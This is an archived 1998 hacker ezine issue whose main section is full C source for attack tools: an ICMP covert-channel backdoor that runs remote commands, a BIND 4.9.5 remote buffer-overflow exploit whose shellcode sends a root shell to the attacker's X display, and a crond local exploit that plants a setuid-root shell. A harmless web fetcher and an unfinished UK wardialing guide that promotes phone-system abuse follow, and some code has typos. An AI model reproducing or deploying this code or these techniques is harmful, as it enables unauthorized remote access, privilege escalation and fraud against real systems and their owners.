💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › CRH › crh009.tx… captured on 2022-01-08 at 15:25:11.
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
������������������������������������������������������������������������������
. [cZo] . Team CodeZero Presents . [cZo] .
������������������������������������������������������������������������������
`~Y$$s, `~~Y$$$s, ;
,ss$$$: :$$$$s, ,ss$$P' :$$$$s,,sss$: `YSss,
:$$$$: ,$$$$P"':$$$$: ,$$$$$:$$$$ :$$$s,
$$$$ `~~~Y$P" $$$$ ,ss$$$$P"' :$$$$ssssss $$$$
:$$$$ ,s:$$$$: `~'YSss, $$$$ `~Y$$$$:
$$$$ :$$$$P'$$$$ :$$$$s, :$$$$: :$$$$
`~Y$$$: :$$$$s;$$$$: $$$$$P"'$$$$$ ,$$$$$:
`~~Y$s,,s$$$P' $$$$$s, :$$$P' :$$$$$s, `~~Y$$$s,
`$P"' :P"' $P' ,s$P"'
: `~s, <mydknight>
������������������������������������������������������������������������������
Issue 9
11th May 1998
�������������������������������������������������������������������������������
Man with the plan : so1o
The usual : om3n, zer0x, xFli, electro,
spheroid, el8, ultima, chameleon.
Not forgotten : loss, organik, peenut, pzn, suid
helix, deprave, manly, Shok.
Others : paladine, Sciri, fiji, ch-E-ztic,
vacuum, humble.
Cheers : Darkcyde, Jf.
Russians : lirik, DemiGod, stranger, ps.
Rhino9 : www.rhino9.org
.-----------[ An Official ]-----------.
: .-----. .----. .--.--. :
: : .--' : .-. : : : : :
!_-:: : : : `-' ; : . : ::-_!
:~-:: :: : :: . : :: : ::-~:
: ::.`--. ::.: : ::.: : :
: `-----' `--'--' `--'--' :
!_-:: ::-_!
:~-::-[ Confidence Remains High ]-::-~:
:~-:: ::-~:
`-----------[ Production ]------------'
�������������������������������������������������������������������������������
In This (compact) Installment of Confidence Remains High :
�������������������������������������������������������������������������������
------=> Section A : Introduction And Cover Story.
1. Confidence Remains High issue 9....................: Tetsu Khan
------=> Section B : Exploits And Code.
1. ICMP backdoor client and server....................: BiT
2. BIND 4.9.5 remote..................................: prym
3. flea.c.............................................: SrfRoG
4. Dillons Linux crond exploit........................: BM V
5. KDE klock local exploit............................: someone on bugtraq
------=> Section C : Phones / Scanning / Radio.
1. Wardialing in the UK...............................: Jf
------=> Section D : Miscellaneous (aka. d0x)
1. p0sse.rolodex (mad outdated anyway)................: juurigaveitout
2. RLoxley, first class fuckwit (and fatboy)..........: WH0 GN0Z?
3. Carolyn Meinel d0x.................................: savec0re
------=> Section E : World News.
1. MOD break DISN.....................................: JP
------=> Section G : FIN.
�������������������������������������������������������������������������������
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
�������������������������������������������������������������������������������
1. Confidence Remains High issue 9 : Tetsu Khan
�������������������������������������������������������������������������������
Blah blah blah, welcome to CRH009, you will find el8 0-day exploits and code,
as well as some semi-interesting texts on a fag called RLoxley, a cl00le$
fuckwit called Carolyn Meinel, and some info on the MOD.. phear
The Distro List :
=================
152.7.11.38 /pub/personal/tattooman/confidence_remains_high/
ftp.sekurity.org /users/so1o/
ftp.technotronic.com /ezines/crh/
cybrids.simplenet.com /Toast/files/CRH/
ftp.linuxwarez.com /pub/crh/
�������������������������������������������������������������������������������
===============================================================================
==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]==
===============================================================================
�������������������������������������������������������������������������������
1. ICMP backdoor client and server : BiT
�������������������������������������������������������������������������������
icmpd.c == server daemon
icmpc.c == client
<--icmpd.c-------------------------------------------------------------------->
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <unistd.h>
#define RID 31337
#define LID 12345
#define VER "0.3"
void start_pipe(char *buf,int len);
void send_connect(unsigned long to, unsigned int id,char *data);
u_short cksum(u_short *buf, int nwords);
void main()
{
char buf[512];
struct iphdr *ip=(struct iphdr *)buf;
struct icmphdr *icmp=(struct icmphdr *)(buf+sizeof(struct iphdr));
int lsock,i;
printf("ICMP PIPE %s - DAEMON PART - BiT'97\n",VER);
if(geteuid())
printf("User luser detected\n"),exit(-1);
lsock=socket(AF_INET,SOCK_RAW,1);
close(0);close(1);close(2);
if(fork())
exit(0);
while(1)
{
i=read(lsock,buf,512);
if(ip->protocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == RID)
start_pipe(buf,i);
}
}
void start_pipe(char *buf,int len)
{
char databuf[512];
FILE *haha;
struct iphdr *ip=(struct iphdr *)buf;
struct icmphdr *icmp=(struct icmphdr *)(buf+sizeof(struct iphdr));
int lsock,i;
char *p;
unsigned long int tmp;
struct sockaddr_in sa;
lsock=socket(AF_INET,SOCK_RAW,1);
icmp->un.echo.id=ntohs(LID);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=ip->saddr;
sendto(lsock,icmp,len-sizeof(struct iphdr),0,(struct sockaddr *)&sa,sizeof(sa));
/* connected */
while(1)
{
i=recv(lsock,buf,512,0);
if(ip->potocol == 1 && icmp->type == 0 && ntohs(icmp->un.echo.id) == RID) {
p=(buf+sizeof(struct iphdr)+sizeof(struct icmphdr));
memcpy(databuf,p,i-(sizeof(struct iphdr)+sizeof(struct icmphdr))+1);
if(strcasecmp(databuf,"exit") == 0)
return;
if((haha=popen(databuf,"r")) == NULL)
send_connect(ip->saddr,LID,"Unknown command.\n");
else {
i=0;
while(fgets(databuf,512,haha) != NULL) {
i++;
send_connect(ip->saddr,LID,databuf);
}
if(!i)
send_connect(ip->saddr,LID,"Unknown command.\n");
pclose(haha);
}
}
fflush(stdout);fflush(stdin);
}
}
void send_connect(unsigned long to, unsigned int id,char *data)
{
char buf[512];
struct icmphdr *icmp = (struct icmphdr *)buf;
char *bla=(buf+sizeof(struct icmphdr));
struct sockaddr_in sa;
int i,sock;
sock=socket(AF_INET,SOCK_RAW,1);
bzero(buf,512);
icmp->type=0;
icmp->un.echo.id=htons(id);
strcpy(bla,data);
icmp->checksum=cksum((u_short *)icmp,(9+strlen(data))>>1);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=to;
i=sendto(sock,buf,(9+strlen(data)),0,(struct sockaddr *)&sa,sizeof(sa));
close(sock);
}
u_short cksum(u_short *buf, int nwords) {
unsigned long sum;
for ( sum = 0; nwords > 0; nwords -- )
sum += *buf++;
sum = ( sum >> 16) + ( sum & 0xffff );
sum += ( sum >> 16 );
return ~sum ;
}
<--end of icmpd.c------------------------------------------------------------->
<-icmpc.c--------------------------------------------------------------------->
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <netdb.h>
#define LID 12345
#define VER "0.3"
unsigned int RID;
unsigned long host,myip;
int state=0;
unsigned long int res(char *p);
void send_connect(unsigned long to, unsigned int id,char *data);
void get_string_and_send(void);
void show_shit(char *buf);
u_short cksum(u_short *buf, int nwords);
void main(int argc, char **argv)
{
char buf[512];
struct iphdr *ip = (struct iphdr *)buf;
struct icmphdr *icmp = (struct icmphdr *)(buf+sizeof(struct iphdr));
int i,lsock;
fd_set f;
printf("ICMP PIPE %s - CLIENT PART - BiT'97\n",VER);
if(argc<3)
printf("%s <host> <rid>\n",*argv),exit(-1);
if(geteuid())
printf("User luser detected\n"),exit(-1);
host=res(argv[1]);
RID=atoi(argv[2]);
lsock=socket(AF_INET,SOCK_RAW,1);
send_connect(host,RID,"a");
stat e=1;
fcntl(lsock,F_SETFL,O_NONBLOCK);
fcntl(fileno(stdin),F_SETFL,O_NONBLOCK);
while(1)
{
fflush(stdout);
fflush(stdin);
FD_ZERO(&f);
FD_SET(fileno(stdin),&f);
FD_SET(lsock,&f);
if(select(FD_SETSIZE,&f,NULL,NULL,NULL))
{
if(FD_ISSET(fileno(stdin),&f))
get_string_and_send();
if(FD_ISSET(lsock,&f)) {
i=read(lsock,buf,512);
if(ip->protocol == 1 && icmp->type == 0 &&
ntohs(icmp->un.echo.id) == LID) {
if(state==2)
show_shit(buf);
if(state==1) {
state++;
printf("Connected.\n");
}
myip=ip->daddr;
}
}
}
}
}
unsigned long int res(char *p)
{
struct hostent *h;
unsigned long int rv;
h=gethostbyname(p);
if(h!=NULL)
memcpy(&rv,h->h_addr,h->h_length);
else
rv=inet_addr(p);
return rv;
}
void send_connect(unsigned long to, unsigned int id,char *data)
{
char buf[512];
struct icmphdr *icmp = (struct icmphdr *)buf;
char *bla=(buf+sizeof(struct icmphdr));
struct sockaddr_in sa;
int i,ssock;
ssock=socket(AF_INET,SOCK_RAW,1);
bzero(buf,512);
icmp->type=0;
icmp->un.echo.id=htons(id);
strcpy(bla,data);
icmp->checksum=cksum((u_short *)icmp,(9+strlen(data))>>1);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=to;
i=sendto(ssock,buf,(9+strlen(data)),0,(struct sockaddr *)&sa,sizeof(sa));
close(ssock);
}
void get_string_and_send(void)
{
char buf[512];
bzero(buf,512);
read(0,buf,512);
buf[strlen(buf)-1]=0;
send_connect(host,RID,buf);
if(strcasecmp(buf,"exit") == 0)
exit(1);
}
void show_shit(char *buf)
{
printf((buf+sizeof(struct iphdr)+sizeof(struct icmphdr)));
}
u_short cksum(u_short *buf, int nwords) {
unsigned long sum;
for ( sum = 0; nwords > 0; nwords -- )
sum += *buf++;
sum = ( sum >> 16) + ( sum & 0xffff );
sum += ( sum >> 16 );
return ~sum ;
}
<--end of icmpc.c------------------------------------------------------------->
�������������������������������������������������������������������������������
2. BIND 4.9.5 remote exploit : prym
�������������������������������������������������������������������������������
/*
* z, thnx.
* ganked the xterm exec from adm, thnx.
* have fun.
* -prym
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
#define REMOTE
#define DEFAULT_ANBUF_OFFSET 300
#define DEFAULT_TARGET 0
#define DEFAULT_OPTIMIZED 0
#define DLEN_VAL 4
#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)
#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)
#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)
struct target_type
{
char desc[40];
int systype;
unsigned long addr;
unsigned long opt_addr;
};
struct target_type target[] =
{
{"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
{"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
{"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
{"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
{"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},
{{0},0,0,0}
};
unsigned long resolve(char *host)
{
long i;
struct hostent *he;
if((i=inet_addr(host))<0)
if((he=gethostbyname(host))==NULL)
return(0);
else
return(*(unsigned long *)he->h_addr);
return(i);
}
int send_packet(int fd, char *buff, int len)
{
char tmp[2], *ptr=tmp;
PUTSHORT(len,ptr);
if(write(fd,tmp,2)!=2)
return(-1);
if(write(fd,buff,len)!=len)
return(-1);
return(1);
}
int attack(int fd, struct in_addr us, struct target_type t,
unsigned long offset, int optimized)
{
char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
HEADER *dnsh=(HEADER *)buff;
unsigned long i;
int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;
memset(dnsh,0,sizeof(HEADER));
dnsh->id = htons(31337);
dnsh->opcode = IQUERY;
dnsh->rd = 1;
dnsh->ra = 1;
dnsh->ancount = htons(1);
ptr += sizeof(HEADER);
len += sizeof(HEADER);
*ptr = '\0';
ptr++;
PUTSHORT(T_A,ptr);
PUTSHORT(C_IN,ptr);
PUTLONG(31337,ptr);
dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
PUTSHORT(dlen,ptr);
len += PRE_OF_DATALEN;
memset(ptr,'X',(sizeof(buff)-(ptr-buff)));
if(t.systype==0)
{
#ifdef REMOTE
char c1[] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";
char c2[] =
"/usr/bin/X11/xterm\xff-display\xff";
char c3[32];
char c4[] =
"\xfe\xe8\xb1\xff\xff\xff";
snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us));
c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);
i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);
memset(ptr,0x90,i);
memcpy((ptr+i),c1,strlen(c1));
memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
#else
char c0de[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi";
int i = EVILSPACE-strlen(c0de);
memset(ptr,0x90,i);
memcpy((ptr+i),c0de,strlen(c0de));
#endif
}
else
return(0);
if(!optimized)
{
memcpy((ptr+(dlen-16)),&al,sizeof(al));
memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
}
i = (optimized?t.opt_addr:t.addr)+offset;
memcpy((ptr+(dlen-4)),&i,sizeof(i));
len += dlen;
return(send_packet(fd,buff,len));
}
int main(int argc, char *argv[])
{
unsigned long offset=DEFAULT_ANBUF_OFFSET;
int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
struct sockaddr_in sa;
struct in_addr xs;
for(i=0;target[i].desc[0];i++);
if(argc<3)
{
fprintf(stderr,"\ntarget types:\n");
fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
"description");
for(target_index=0;target_index<i;target_index++)
fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
(unsigned int)target[target_index].addr,
(unsigned int)target[target_index].opt_addr,
target[target_index].desc);
fprintf(stderr,
"\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
argv[0]);
exit(-1);
}
if((argc>3)&&((target_index=atoi(argv[3]))>=i))
{
fprintf(stderr,"error: invalid target type %d\n",target_index);
exit(-1);
}
if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
{
fprintf(stderr,"error: internal error\n");
exit(-1);
}
if(argc>4)
{
optimized = atoi(argv[4]);
if((optimized!=0)&&(optimized!=1))
{
fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
exit(-1);
}
}
if((optimized==0)&&(target[target_index].addr==0))
optimized = 1;
if((optimized==1)&&(target[target_index].opt_addr==0))
optimized = 0;
if(argc>5)
offset = atoi(argv[5]);
if(!(xs.s_addr=resolve(argv[2])))
{
fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
exit(-1);
}
if(!(sa.sin_addr.s_addr=resolve(argv[1])))
{
fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
exit(-1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(53);
if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
{
perror("error: socket");
exit(-1);
}
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
{
perror("error: connect");
exit(-1);
}
printf("target : %s\n",inet_ntoa(sa.sin_addr));
printf("target type : %s\n",target[target_index].desc);
printf("optimized named : %s\n",(optimized?"YES":"NO"));
printf("anbuff addr : 0x%x\n",(unsigned int)
(optimized?target[target_index].opt_addr:target[target_index].addr));
printf("anbuff addr offset : %lu\n",offset);
printf("xterm display dest : %s:0\n",inet_ntoa(xs));
printf("exploiting . . .\n");
switch(attack(sock,xs,target[target_index],offset,optimized))
{
case -1:
perror("error: attack");
return(-1);
break;
case 0:
fprintf(stderr,"error: internal error\n");
return(-1);
break;
}
if(close(sock)!=0)
{
perror("error: close");
return(-1);
}
exit(0);
}
�������������������������������������������������������������������������������
3. flea.c : SrfRoG
�������������������������������������������������������������������������������
/*
* flea.c : fetch stuff from the Web without launching a browser.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
*/
/*
* TODO:
*
* 1) Use threads for multiple gets.
* 2) More file options.
* 3) Better output display.
* 4) Configuration file.
* 5) Host cache'ing.
* 6) HTTP/1.1 Message parsing / compliance.
* 7) MIME types handling.
*
* Email comments / suggestions to srfrog@nema.com
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <netdb.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#ifndef TRUE
#define TRUE 1
#define FALSE 0
#endif
#define m_isalpha(x) (((x) >= 'a' && (x) <= 'z') || ((x) >= 'A' && (x) <= 'Z'))
#define m_isdigit(x) ((x) >= '0' && (x) <= '9')
#define m_isspace(x) ((x) == ' ' || (x) == '\f' || (x) == '\n' || (x) == '\r' || (x) == '\t' || (x) == '\v')
#define MAXLEN 512
#define WIDTH 79
#define VERSION "0.9"
unsigned int serv_port(char);
/* Some variables used */
static int nofetchfile = FALSE;
static char *pn = (char *)0;
typedef struct url_entry
{
char *hostname;
unsigned int port;
char *path;
char *file;
} URL;
static void status(char *fmt, ...)
{
va_list msg;
char buf[MAXLEN], *p = buf, c;
int len;
static int old_len = 0;
va_start(msg, fmt);
vsprintf(buf, fmt, msg);
va_end(msg);
len = strlen(buf) - 1;
c = buf[len];
write(1, p, len);
if (old_len > len) {
int i, j;
char k = ' ';
for (i=0, j=(old_len - len); j > i; ++i)
write(1, &k, 1);
write(1, &c, 1);
return;
}
old_len = len;
write(1, &c, 1);
}
static int strcount(s, c)
char *s, c;
{
int index=0, count=0;
while (s[index] != '\0')
{
if (s[index] == c)
count++;
index++;
}
return(count);
}
static URL strip_url(url)
char *url;
{
int i, idx=0, skip=0;
char tmp[MAXLEN*2], *p = tmp;
URL u;
if (0 == strncmp(url,"http://",7))
idx = 7;
for (i=0; (url[idx]!=':' && url[idx]!='/' && url[idx]!='\0'); i++,idx++)
tmp[i] = url[idx];
if (i == 0)
return (u);
tmp[i] = 0;
u.hostname = strdup(p);
if (url[idx] == ':') {
++idx;
for (i=0; m_isdigit(url[idx]); i++,idx++)
tmp[i] = url[idx];
tmp[i] = 0;
u.port = (unsigned int) atoi(p);
} else
u.port = 80;
skip = strcount(&url[idx], '/');
for (i=0; skip > 0; i++,idx++)
{
tmp[i] = url[idx];
if (url[idx]=='/')
skip--;
}
tmp[i] = 0;
u.path = strdup(p);
for (i=0; url[idx]!='\0'; i++,idx++)
tmp[i] = url[idx];
tmp[i]=0;
u.file = strdup(p);
if (i == 0) {
nofetchfile = TRUE;
strcpy(p,"flea.dump");
u.file = strdup(p);
}
return (u);
}
static int connect_url(u)
URL u;
{
struct hostent *host;
struct sockaddr_in sin;
int s = -1;
if ((host = gethostbyname(u.hostname)) == NULL) {
perror(pn);
return(-1);
}
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror(pn);
return(-2);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(u.port);
bcopy(host->h_addr, &sin.sin_addr, host->h_length);
printf("Connecting to remote host %s:%u\n", u.hostname, u.port);
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror(pn);
close(s);
return(-3);
}
return (s);
}
static void process_file(fdw, fdr, u)
int fdw, fdr;
URL *u;
{
time_t start = 0L, end = 0L;
int n, m, bytes=0;
float x=0.0;
char buffer[MAXLEN+1], *p = buffer;
time(&start);
while (1) {
n = read(fdr, p, MAXLEN);
switch (n) {
case -1:
status("%s: Read error: %s\n", u->file, strerror(errno));
break;
case 0:
time(&end);
n = (int)(end - start) + 1;
x = (float)bytes / (float)n;
x /= 1024.0;
status("%s: Received %d bytes in %d sec%s (%.3f kb/s)\n",
u->file, bytes, n, (n == 1) ? "" : "s", x);
break;
default:
m = write(fdw, p, n);
if (m > 0) {
bytes += m;
status("%s: Writing: %d bytes\r", u->file, bytes);
continue;
}
status("%s: Write error: %s\n", u->file, strerror(errno));
break;
}
break;
}
close(fdw);
close(fdr);
}
static void launch_fetcher(url)
char *url;
{
int sock = -1, i, j,
outfd = -1;
URL u;
char tmp[MAXLEN*2];
/* sanity */
if (!url)
return;
u = strip_url(url);
if (!u.hostname) {
perror(pn);
return;
}
if ((sock = connect_url(u)) < 0)
return;
if ((outfd = open(u.file, O_WRONLY | O_CREAT | O_TRUNC, 0644)) < 0) {
perror(pn);
close(sock);
return;
}
#if defined(__linux__)
i = sprintf(tmp, "GET %s%s HTTP/1.0\r\n\r\n",
u.path, (nofetchfile == FALSE)?u.file:"/");
#else
sprintf(tmp, "GET %s%s HTTP/1.0\r\n\r\n",
u.path, (nofetchfile == FALSE)?u.file:"/");
i = strlen(tmp);
#endif
if (send(sock, tmp, i, 0) < 0) {
perror(pn);
close(sock);
close(outfd);
return;
}
/* remove httpd header */
{
char c;
j=0;
while (read(sock, &c, 1)) {
tmp[j++] = c;
if (c != '\n')
continue;
if (j > 2) {
tmp[j]=0; j=0;
printf("%s: %s",u.file,tmp);
fflush(stdout);
continue;
}
break;
}
}
status("%s: Waiting for data connection...\r", u.file);
process_file(outfd, sock, &u);
}
int main(argc, argv)
int argc;
char **argv;
{
if (argc < 2) {
printf("\nflea Web fetcher v%s by SrfRoG (srfrog@nema.com)\n\n", VERSION);
puts("\
Usage: flea [http://host[:port][/][filename]]\n\n\
If no file is given, the index file or file listing\n\
is dumped to 'flea.dump'.\n\n\
Examples:\n\
\tflea http://www.cgifx.com/img/cgifx.gif\n\
\tflea http://www.cgifx.com/img/\n\
\tflea http://www.cgifx.com");
fflush(stdout);
return 1;
}
pn = argv[0];
launch_fetcher(argv[1]);
return 0;
}
�������������������������������������������������������������������������������
4. Dillons Linux crond exploit : BM V
�������������������������������������������������������������������������������
/* Dillon's Crond v2.2 exploit */
/* */
/* There exists a buffer overflow */
/* in Slackware's /usr/sbin/crond */
/* in the fdprintf() function from */
/* subs.c [specifically vsprintf()] */
/* Also take note that the overflow */
/* was discovered by the KSRT team. */
/* */
/* Simply compile and run this. */
/* and look for a suid root shell */
/* in /tmp (/tmp/XxX) in about one */
/* minute. Also please use this in */
/* a responsible manner. */
/* */
/* also try crondsploit 1000 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#define DEFAULT_OFFSET 560
#define DEFAULT_BUFFER_SIZE 980
#define TOTAL_BUFFER 4096
char shellcode[]=
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/tmp/xo";
long get_esp(void) {
__asm__("movl %esp,%eax");
}
void calc_bs(int *bs_ptr)
{
int len=0;
struct passwd *p_name;
/* dependant on length of username */
p_name=getpwuid(getuid());
len=strlen(p_name->pw_name);
*bs_ptr = 986 - len;
return;
}
int main(int argc, char **argv) {
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i, ofs=DEFAULT_OFFSET;
int bs=DEFAULT_BUFFER_SIZE;
FILE *fp=NULL;
/* probably will not need to give argument */
if (argc==2)
ofs=atoi(argv[1]);
calc_bs(&bs);
buff=malloc(TOTAL_BUFFER);
if(!buff) {
perror("malloc");
exit(EXIT_FAILURE);
}
ptr=buff;
memset(ptr,0x90, bs-strlen(shellcode));
ptr += bs-strlen(shellcode);
for (i=0; i<strlen(shellcode); i++)
*(ptr++) = shellcode[i];
addr_ptr = (long *)ptr;
for (i=0; i<2; i++)
*(addr_ptr++)=get_esp()-ofs;
ptr=(char *)addr_ptr;
*ptr=0;
/* create binary in /tmp to make suid shell */
fp=fopen("/tmp/xo.c","w+");
if (!fp) {
fprintf(stderr,"Can't open /tmp/xo.c for writing!");
exit(EXIT_FAILURE);
}
fprintf(fp,"#include <stdio.h>\n");
fprintf(fp,"#include <stdlib.h>\n");
fprintf(fp,"main() {\n");
fprintf(fp,"\tsystem(\"/bin/cp /bin/sh /tmp/XxX\");\n");
fprintf(fp,"\tsystem(\"chown root /tmp/XxX\");\n");
fprintf(fp,"\tsystem(\"chmod 4755 /tmp/XxX\");\n");
fprintf(fp,"}\n");
fclose(fp);
/* compile our program to create suid shell */
system("cc -o /tmp/xo /tmp/xo.c");
unlink("/tmp/xo.c");
/* now use crontab to plant overflow for crond */
fp=fopen("r00t","w+");
if (!fp) {
perror("fopen");
exit(EXIT_FAILURE);
}
fprintf(fp,"%s\n",buff);
fclose(fp);
/* put our r00t crontab in crontabs directory */
system("/usr/bin/crontab r00t");
unlink("r00t");
/* helpful reminder */
printf("Now wait about 1 minute and look\n");
printf("for the suid shell -> /tmp/XxX\n");
exit(0);
}
�������������������������������������������������������������������������������
5. KDE klock local exploit : someone on bugtraq
�������������������������������������������������������������������������������
..included in kde.gz with this crh009.zip
�������������������������������������������������������������������������������
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
�������������������������������������������������������������������������������
1. Wardialing in the UK : Jf
�������������������������������������������������������������������������������
Wardialing in the UK, for me, is a very interesting subject. Although a lot of
the modern c0de kiddies consider it "old-sk00l" and see it as no use today,
Wardialing is actually, in my opinion, one of the greatest Hacking related
things to do. Hacking a Webpage is fun yes but an isolated carrier provides
much more entertainment and excitement, and via wardialing we aim to find
these carriers along with lots of other cool things which will provide the
phun.
All the time, I am approached and people ask me HOW TO wardial in the UK,
I always tell people its the same as in the UK, but people act so confused
about the whole idea of UK Wardialing. Basically the little Windoze kiddies
see some old wardialer, try it out and find that the area code to enter is only
allowed to be up to 3 numbers long, therefore a US area code, with this they
panic and cry out for help. Or they download a version of ToneLoc and PANIC
because they do not understand the program, which CAN be used for UK
wardialing and its the one I always use. This is where this help file is
intended to come in useful, it will guide you through the basics of wardialing
in the UK, and what you will find on your journey and it will also guide you
with using Toneloc succesfully to scan loads of numbers and gain interesting
results infinding carriers, VMBs, PBXs and numerous other interesting things.
##############
Where to start
##############
Wardialing is the process of scanning a large range of numbers and finding
interesting things, as I have already stated. There are literally thousands
of Carrier Tones in England which all perform different tasks and are owned
by different companies.
For example -
Banks (yes BANKS, hehe),
Libraries (delete those excess fines)
Local Government (piss off your council)
..and loads more big companies and organisations.
It may sound like a little movie-style picture of hacking (WARGAMES comes to
mind) but its REAL, it does exist and people do mess with this sort of thing,
hehe. Certain Carrier tones can also be abused and be setup so that you can
connect perfectly to the Internet which will result, if the carrier is located
within a FREE CALL netw0rks, in an 0800 dialup.
People tend to mainly wardial for carrier tones but VMBs and PBXs can be found
by Wardialing as well, so wardialing provides a great use for Phreaks who are
interestedin these things. Although I personally haven't found an PBX while
wardialing for about 6 months but, someone, somewhere will no doubt be finding
one and abusing one as I type. VMBs are common findings while wardialing,
especially on FREE CALL netw0rks and I have great phun with these.
The 0800/0500 Service Network numbers, which are of course FREE, are the best
place to start wardialing due to the LARGE percentage of businesses who have
carriers located on them, to transfer data from area to area at low cost
(only rental of number). It is also a lot safer to wardial than normal area
codes because you will not be dialing peoples houses, so you can dial 0800/0500
numbers at night and not be waking people up (not that I care, its just that
they might report the wardialing call to BT as a nuisance call).
If you like the idea of Blueboxing then the 0800 89 **** number block will
interest you. As you may already know, this block of numbers act as the
COUNTRY DIRECT numbers, with some being boxable. From wardialing you will be
able to note which ones are boxable if you listen into the wardialing progress,
as boxable numbers (CCITT5 Lines) will give a little series of bleeps when they
pickup, these are instantly recognisable and if you here this you will know that
it is boxable.
Well thats a basic introduction into the uses of Wardialing in the UK, so how
bout it? Are you ready to step into this world? This is the real deal and could
land you in a lot more trouble than a webpage hack, no doubt most people reading
this will have already delved into wardialing as it is nothing new but some
newbies to the subject might be a little misguided about the whole wardialing
deal...
#######
ToneLoc
#######
Yes, This is the wardialer that I recommend for wardialing in the UK, it is
however one of the mose complicated to understand if you have never used it
before, but this section will explain how to use ToneLoc to its full
capabilities and get scanning straight away. A download URL for ToneLoc is
